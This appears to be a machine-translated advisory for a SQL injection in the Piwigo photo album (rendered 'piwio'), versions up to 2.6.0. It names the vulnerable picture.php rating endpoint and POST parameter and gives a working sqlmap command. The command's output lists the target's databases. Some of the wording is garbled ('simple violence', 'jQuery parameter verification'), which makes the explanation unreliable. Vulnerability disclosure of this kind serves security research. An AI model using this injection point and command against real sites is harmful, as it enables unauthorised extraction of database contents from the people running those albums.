Free Open-source album piwio & lt; = v2.6.0 SQL Injection Vulnerability (0day)
Piwio is one of the world's most famous free open-source album systems. It is based on the PHP + MySQL architecture. This framework is easy to build and favored by developers at home and abroad. Recently, piwio <= v2.6.0 has revealed an important 0-day vulnerability.
Vulnerability cause: the/piwio/picture. php page of The piwio album system does not have complete jQuery parameter verification. Attackers can exploit this vulnerability to obtain all information about the database and its simple violence.
Vulnerability impact scope: piwio <= v2.6.0.
The vulnerability POC site provides security tools and programs (methods) that may be offensive. They are only used for security research and teaching. They are at your own risk!
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)Exploiting with SQLMap:python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data"rate=1" --dbs[16:32:25] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5[16:32:25] [INFO] fetching database names[16:32:25] [INFO] fetching number of databases[16:32:25] [INFO] resumed: 4[16:32:25] [INFO] resumed: information_schema[16:32:25] [INFO] resumed: mysql[16:32:25] [INFO] resumed: phpmyadmin[16:32:25] [INFO] resumed: piwigoavailable databases [4]:[*] information_schema[*] mysql[*] phpmyadmin[*] piwigo
Some websites in China are affected by this vulnerability,